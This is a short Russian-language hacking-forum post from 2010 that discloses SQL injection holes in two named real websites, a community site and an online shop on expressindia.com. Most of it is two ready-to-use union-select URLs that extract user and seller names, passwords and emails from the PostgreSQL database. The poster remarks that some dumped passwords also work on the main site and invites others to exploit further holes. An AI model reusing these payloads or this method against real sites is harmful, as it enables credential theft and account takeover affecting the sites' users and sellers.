04.08.2010, 19:53
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
expressindia.com
PR - 8
уязвимость на уже не существующем проекте community.expressindia.com:
Код:
http://community.expressindia.com/myindia/message_popup.php?postId=-42612+union+select+null,null,name||chr(58)||password||chr(58)||email+from+mboard_user+limit+1+offset+0--+
некоторое пароли подходят и для главной странички ;-)
sql inj присутствует также в интернет-магазине, хостящемся на expressindia.com:
доступа к pg_shadow нет, но кое-что полезное можно извлечь... к примеру пароли продавцов магазина (формате base64, как я понимаю)
Код:
http://shopping.expressindia.com/index.php?page=listing&catId=-650+union+select+null,name||chr(58)||password||chr(58)||email,null,null,null,null,null,null+from+seller--+
db - PostgreSQL
вообще на сайте, как мне показалось, есть еще не мало дырок... если кто-нибудь захочет докрутить - u r welcome
|
|
|